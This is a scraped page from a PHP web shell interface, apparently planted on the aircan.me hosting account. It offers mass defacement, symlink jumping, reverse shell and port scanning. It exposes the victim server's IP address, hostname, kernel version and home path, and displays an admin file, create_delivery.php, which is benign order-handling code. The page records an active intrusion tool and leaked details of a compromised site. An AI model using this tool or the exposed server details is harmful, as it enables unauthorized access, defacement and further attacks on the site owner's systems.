Tul xxx Tul
User / IP
:
216.73.216.146
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
dondedy
/
admin
/
Viewing: create_delivery.php
<?php header('Content-Type: application/json; charset=utf-8'); include '../components/connect.php'; session_start(); $admin_id = $_SESSION['admin_id'] ?? null; if(!$admin_id){ http_response_code(401); echo json_encode(['success' => false, 'message' => 'No autorizado']); exit(); } // Helper: respuesta de error function respond_error($msg, $code = 400){ http_response_code($code); echo json_encode(['success' => false, 'message' => $msg]); exit(); } if($_SERVER['REQUEST_METHOD'] !== 'POST'){ respond_error('Método no permitido', 405); } $customer_name = trim($_POST['customer_name'] ?? ''); $phone = trim($_POST['phone'] ?? ''); $address = trim($_POST['address'] ?? ''); $payment_method = trim($_POST['payment_method'] ?? ''); $notes = trim($_POST['notes'] ?? ''); $order_items = $_POST['order_items'] ?? ''; $total_amount = (float)($_POST['total_amount'] ?? 0); if($customer_name === '' || $phone === '' || $address === '' || $payment_method === ''){ respond_error('Datos incompletos'); } $valid_methods = ['efectivo','transferencia']; if(!in_array($payment_method, $valid_methods, true)){ respond_error('Método de pago no válido'); } $items = json_decode($order_items, true); if(!is_array($items) || count($items) === 0){ respond_error('El pedido no contiene productos'); } // Recalcular total de forma segura usando precios de BD try { $ids = array_values(array_unique(array_map(function($it){ return (int)($it['id'] ?? 0); }, $items))); if(empty($ids)) respond_error('Items inválidos'); $placeholders = implode(',', array_fill(0, count($ids), '?')); $stmt = $conn->prepare("SELECT id, name, price, sale_price FROM products WHERE id IN ($placeholders)"); $stmt->execute($ids); $dbProducts = $stmt->fetchAll(PDO::FETCH_ASSOC); $byId = []; foreach($dbProducts as $p){ $byId[(int)$p['id']] = $p; } $cleanItems = []; $serverTotal = 0.0; foreach($items as $item){ $pid = (int)($item['id'] ?? 0); $qty = (int)($item['cantidad'] ?? 0); if($pid <= 0 || $qty <= 0 || !isset($byId[$pid])) continue; $pname = $byId[$pid]['name']; $costPrice = (float)$byId[$pid]['price']; $salePrice = isset($byId[$pid]['sale_price']) && (float)$byId[$pid]['sale_price'] > 0 ? (float)$byId[$pid]['sale_price'] : $costPrice; $subtotal = $salePrice * $qty; $serverTotal += $subtotal; $cleanItems[] = [ 'id' => $pid, 'nombre' => $pname, 'precio' => $salePrice, 'coste' => $costPrice, 'cantidad' => $qty ]; } if(empty($cleanItems)) respond_error('Productos no válidos'); // Insertar pedido $conn->beginTransaction(); $insert_order = $conn->prepare("INSERT INTO `delivery_orders` (customer_name, phone, address, payment_method, notes, order_items, total_amount) VALUES (?,?,?,?,?,?,?)"); $insert_order->execute([ $customer_name, $phone, $address, $payment_method, $notes, json_encode($cleanItems, JSON_UNESCAPED_UNICODE|JSON_UNESCAPED_SLASHES), $serverTotal ]); $order_id = (int)$conn->lastInsertId(); // Insertar items detalle $ins_item = $conn->prepare("INSERT INTO `delivery_order_items` (order_id, product_id, product_name, quantity, price, cost_price, subtotal) VALUES (?,?,?,?,?,?,?)"); foreach($cleanItems as $ci){ $ins_item->execute([ $order_id, $ci['id'], $ci['nombre'], $ci['cantidad'], $ci['precio'], $ci['coste'], $ci['precio'] * $ci['cantidad'] ]); } $conn->commit(); echo json_encode(['success' => true, 'order_id' => $order_id, 'total' => $serverTotal]); } catch (Throwable $e){ if($conn->inTransaction()) $conn->rollBack(); respond_error('Error al guardar el pedido'); }
Coded With 💗 by
0x6ick